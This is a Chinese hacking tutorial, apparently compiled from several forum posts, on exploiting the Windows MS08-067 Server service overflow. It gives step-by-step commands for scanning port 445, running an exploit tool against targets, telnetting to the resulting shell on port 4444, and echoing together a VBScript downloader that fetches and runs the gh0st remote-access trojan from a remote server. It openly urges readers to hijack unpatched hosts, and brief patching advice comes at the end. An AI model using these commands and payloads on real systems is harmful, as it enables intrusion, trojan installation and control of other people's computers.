黑客MS08067漏洞攻击全程演示图解.docx
- 文档编号:23816293
- 上传时间:2023-05-21
- 格式:DOCX
- 页数:15
- 大小:146.76KB
黑客MS08067漏洞攻击全程演示图解.docx
《黑客MS08067漏洞攻击全程演示图解.docx》由会员分享,可在线阅读,更多相关《黑客MS08067漏洞攻击全程演示图解.docx(15页珍藏版)》请在冰豆网上搜索。
黑客黑客MS08067漏洞攻击全程演示图解漏洞攻击全程演示图解黑客MS08-067漏洞攻击全程演示(图解)MS08-067漏洞是Server服务中的漏洞,该漏洞可能允许远程代码执行。
下面我们来进行MS08-067漏洞远程溢出演示,让我们看看我们的机子是如何轻易的成为人家的肉鸡,被控制的1.漏洞主机扫描。
使用专业端口扫描工具扫描445端口。
获取可溢出的主机列表。
如下图:
2.MS08-067溢出工具进行主机溢出,格式ms08-067.exeip溢出成功标志:
SMBConnectOK!
SendPayloadOver!
3.溢出成功后会开放4444端口,直接telnet登陆上去。
4.Ipconfig确认溢出成功。
5.添加用户确认获取系统权限6.防范办法:
针对该溢出,我们并不是没有办法,既然是要扫描445端口,然后telnet,我们只需如下的方法就可以解决:
一、及时安装KB958644补丁二、关闭或屏蔽掉445端口。
三、安装专业防火墙。
MS08-067溢出:
扫445端口,溢出Q:
提示SMBConnectOK!
RpcExceptionCode()=1722这样溢出成功了么?
A:
溢出失败,对方开启了防火墙。
Q:
提示MakeSMBConnectionerror:
1203是怎么回事?
A:
对方没有开机联网或者没有安装Microsoft网络的文件和打印机共享协议或没有启动Server服务。
Q:
提示SMBConnectOK!
MaybePatched!
补丁已经打上了。
不存在漏洞。
SMBConnectOKMaybePatched!
这个说明对方已经打了补丁SMBConnectOK!
SendPayloadOver!
溢出成功-在cmd下直接运行MS08-067.exe出现命令帮助MS08-067.exe很简单,只需要输入MS08-067.exeIP就可以了。
MS08-067ExploitforCNbyft=#ff0000,目标机为虚拟机(IP192.168.1.2),攻击者为本机(IP192.168.1.188)虚拟机端口开放如下:
输入命令:
MS08-067.exe192.168.1.2提示:
SMBConnectOK!
SendPayloadOver!
再次查看虚拟机的端口:
我们看到当我们运行了MS08-067.exe192.168.1.2之后,虚拟机的端口出现了个4444端口,状态为LISTENING,这时就说明已经溢出成功了,接下来我们在本机运行Telnet192.168.1.24444就可以了Telnet登陆到目标机了。
2008年10月29日新洞试练Ms08-067Exp详细测试流程(图文)新洞试练Ms08-067Exp详细测试流程(图文)WritedBy樱木花盗Blog:
*为了测试这个,我装了三个虚拟机。
一两个XP一个2003,终于弄明白都需要哪些必要条件了,写出来和大家分享,希望对离成功还差一步的同学们有所帮助,感谢幻影的牛人放出MS08-067的Exp,自由,共享。
下载:
MS08-067.rar经过N+1次的测试之后发现,本机和目标机必须要开启以下服务,否则就算对方没有打补丁也会失败。
Server、ComputerBrowser、Workstation。
下面测试开始(和我局域网的同学们的电脑我都会第一时间叫他们打补丁。
这次没法儿用他们的电脑测试了,我只好装虚拟机测试)在cmd下直接运行MS08-067.exe出现命令帮助MS08-067.exe很简单,只需要输入MS08-067.exeIP就可以了。
MS08-067ExploitforCNby*目标机为虚拟机(IP192.168.1.2),攻击者为本机(IP192.168.1.188)虚拟机端口开放如下:
输入命令:
MS08-067.exe192.168.1.2提示:
SMBConnectOK!
SendPayloadOver!
再次查看虚拟机的端口:
我们看到当我们运行了MS08-067.exe192.168.1.2之后,虚拟机的端口出现了个4444端口,状态为LISTENING,这时就说明已经溢出成功了,接下来我们在本机运行Telnet192.168.1.24444就可以了Telnet登陆到目标机了。
执行个命令加个帐户看看,成功了测试到此结束,以下关于此次测试大家可能遇到的几个问题我在这里集中回答下。
Q:
我的服务里没有Server这个服务怎么办?
A:
在本地连接-属性里点安装-服务-添加-Microsoft网络的文件和打印机共享,点确定,会提示是否重启,其实不用重启就可以,在服务里按F5刷新一下就有这个服务了。
Q:
提示SMBConnectOK!
RpcExceptionCode()=1722这样溢出成功了么?
A:
溢出失败,对方开启了防火墙。
Q:
提示MakeSMBConnectionerror:
1203是怎么回事?
A:
对方没有开机联网或者没有安装Microsoft网络的文件和打印机共享协议或没有启动Server服务。
Q:
提示SMBConnectOK!
MaybePatched!
是怎么回事?
A:
目标已经打上了这个补丁。
转载请注明出自暗组技术论坛http:
/利用远程溢出漏洞进行攻击是一种非常有效而且威力巨大的黑客攻击手段,不过远程溢出漏洞有很强的时效性,必须要抓紧时间利用这个漏洞还未被普遍补上的时机进行攻击,一旦过了这段时间,漏洞补上之后就很难再重现远程溢出攻击了。
微软Windows系统已经有一年多没有爆出远程溢出漏洞了,微软爆出四年以来最严重的特大安全漏洞MS08-067远程溢出漏洞,几乎影响所有Windows系统,并且很快成为黑客攻击和木马传播利用的手段,受此漏洞危害的用户系统将会非常之多!
让我们快借此机会玩玩远程溢出吧!
学过远程溢出的赶紧进行实践,抓肉鸡一抓就得!
一、MS08-067远程溢出漏洞简介曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。
MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有WindowsXP/2000/Vista/2003等。
除WindowsServer2008Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows2000、WindowsXP和WindowsServer2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。
这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
二、漏洞主机扫描在利用MS08-067远程溢出漏洞进行攻击前,首先要找到要攻击的主机目标。
由于启用了RPC服务的Windows系统往往会开放445端口,因此攻击者只要使用专业端口扫描工具扫描445端口,即可获取可溢出的主机列表。
这里使用的是老牌扫描工具图标是一个瑞士军刀的X-Scan。
1.扫描设置步骤1:
运行X-Scan后,首先需要设置扫描的目标IP地址段。
点击工具栏上的“扫描参数”按钮,选择“检测范围”选项,在“指定IP范围”里可以输入一个固定的IP地址或IP地址段。
步骤2:
切换到“全局设置”“扫描模块”选项,设置扫描模块为“开放服务”。
步骤3:
在“插件设置”“端口相关设置”中,将待检测的端口改为“445”。
步骤4:
在“全局设置”“其它设置”中,将扫描类型设置为“无条件扫描”。
步骤5:
最后在“全局设置”“扫描报告”中勾选“扫描完成后自动生成并显示报告”项,设置完毕后点击确定按钮,关闭对话框。
步骤6:
点击工具栏上的“开始扫描”按钮,X-scan就开始工作了。
确定后,即可开始进行扫描。
扫描结束后,会自动弹出一个扫描结果窗口查看到扫描结果。
如果发现开放了445端口的主机,那么这些主机只要未及时打上补丁,都很可能遭受攻击成为入侵者的肉鸡!
三、MS08-067溢出工具溢出攻击现在我们可以一个一个的尝试溢出攻击扫描出来的目标了。
首先,下载溢出攻击工具“MS08-067远程溢出漏洞利用工具”,并将其解压于C盘根目录下。
点击“开始”菜单“运行”,输入命令“CMD”,回车后打开命令提示符窗口。
进入溢出工具所有的文件夹“Release”目录下,执行命令“MS08-067.exe”,可看到溢出工具命令使用格式为:
MS08-067.exe,将其中的Server换为自己要攻击的远程主机就可以了。
1.建立空连接在攻击前,首先要与目标主机建立一个空连接,这里假设我们要攻击的目标主机为“192.168.1.8”,可执行如下命令:
netuse192.168.1.9ipc$命令执行后,即可与远程主机建立一个空连接。
提示:
这一步不是必须的,如果有的主机无法溢出成功,可以先进行空连接。
而有的主机则不必建立空连接,即可进行溢出。
2.执行远程溢出建立空连接后,即可进行溢出攻击了。
攻击命令如下:
MS08-067.exe192.168.1.9执行攻击命令后,溢出程序就会自动与远程主机建立SMB连接,并进行溢出攻击。
3.溢出返回结果溢出攻击后,往往会有不同的返回结果提示信息,一般有三种情况:
如果返回的信息为:
SMBConnectOK!
MaybePatched!
那么说明远程主机上可能已经打上了该溢出漏洞补丁,虽然可以建立SMB连接,但是无法攻击成功。
如果返回信息为:
MakeSMBConnectionerror:
53或者MakeSMBConnectionerror:
1219,后面的数字可能是变化的。
那么说明该主机没有开机连网或者没有安装Microsoft网络的文件和打印机共享协议或没有启动Server服务,因此无法进行溢出。
还有一种情况是返回信息为:
SMBConnectOK!
RpcExceptionCode()=1722出现这样的情况,溢出失败,对方开启了防火墙。
那么最后就是成功的提示信息了:
SMBConnectOK!
SendPayloadOver!
出现这样的提示,说明溢出成功,成功的发送溢出模块并绑定在了远程主机端口上。
4.远程登录现在溢出成功后就可以远程登录了,登录命令很简单:
TlenetIP地址4444直接用Telnet连接远程主机IP地址的4444端口就可以了。
这里执行了命令:
Telnet119.1.41.974444成功的连接上了远程主机。
在远程主机上执行命令“netstat-an”时,可以看到开放了4444端口,这就是溢出打开的端口。
四、VBS脚本入侵现在我们可以在远程主机上任意添加管理员帐户,或者开启3389远程桌面进行连接。
不过最简单的还是用木马来进行攻击。
1.配置木马首先,配置一个木马服务端程序,这里我选择了“gh0st3.6”,这个木马可以过瑞星和卡巴斯基的主动防御,非常强!
将木马上传到某个空间中,然后在远程主机上执行命令:
“tasklist”,命令执行后可查看远程主机上的所有进程。
这里我们发现远程主机未开启任何防火墙和杀毒软件,而且发现对方正在玩QQ游戏斗地主。
没有运行杀毒软件的话,可以直接上传木马,连免杀都不用。
如果发现杀毒软件进程的话,可以有针对性的进行免杀。
2.生成下载脚本然后在远程命令窗口中执行如下命令:
echoiLocal=LCase(WScript.Arguments
(1)iget.vbeechoiRemote=LCase(WScript.Arguments(0)iget.vbeechoSetxPost=CreateObject(Microsoft.XMLHTTP)iget.vbeechoxPost.OpenGET,iRemote,0iget.vbeechoxPost.Send()iget.vbeechoSetsGet=CreateObject(ADODB.Stream)iget.vbeechosGet.Mode=3iget.vbeechosGet.Type=1iget.vbeechosGet.Open()iget.vbeechosGet.Write(xPost.responseBody)iget.vbeechosGet.SaveToFileiLocal,2iget.vbe命令执行后,可在远程主机当前目录下生成一个名为“iget.vbe”的脚本文件。
在远程窗口中执行生成脚本和下载木马并运行时,速度一定要快,否则如果对方关机或者出现什么意外断开连接时,就无法再次连接了。
因为这个漏洞只能溢出一次,而且溢出后只能连接一次。
3.下载运行木马生成下载脚本后,就可以用脚本下载运行木马程序了,这里我们上传的木马连接地址为“http:
/:
81/server.exe”,因此执行如下命令:
cscriptiget.vbehttp:
/:
81/server.exesvch0st.exe前面的“cscript”是用于执行脚本的,后面的“svch0st.exe”是下载木马后保存的文件名。
命令执行后,木马就被下载到远程主机上了。
在命令行窗口中执行“svch0st.exe”,即可成功运行木马程序。
用木马客户端连接木马,一台肉鸡就到手啦!
笔者在测试过程中,发现MS08-067远程溢出成功率可达30%以上。
一般来说,只要远程主机上未安装防火墙,并且同时开启了ComputerBrowser、Server、Workstation这三个系统服务,并且存在此溢出漏洞,通常都可以溢出成功。
五、防范MS08-067远程溢出由于MS08-067远程溢出危害非常大,因此有必要对其进行防范。
但是由于前段时间的微软“黑屏”事件让不少用户成了关闭了自动更新,宁可系统漏洞百出也不去打补丁,于是此漏洞在许多主机上都存在,给黑客利用MS08-067漏洞进行攻击提供了可乘之机。
其实造成盗版用户黑屏的补丁是KB892130,这个漏洞的安全补丁编号是KB958644,我们只要安装此补丁就可以了,也可以通过第三方工具,下载补丁包打上该补丁。
另外,将ComputerBrowser、Server、Workstation这三个系统服务关闭,毕竟这三个服务在大多数情况下是用不到的。
同时,为了防止以后RPC又出现什么漏洞,最好是安装防火墙,关闭本机的445端口。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 黑客 MS08067 漏洞 攻击 全程 演示 图解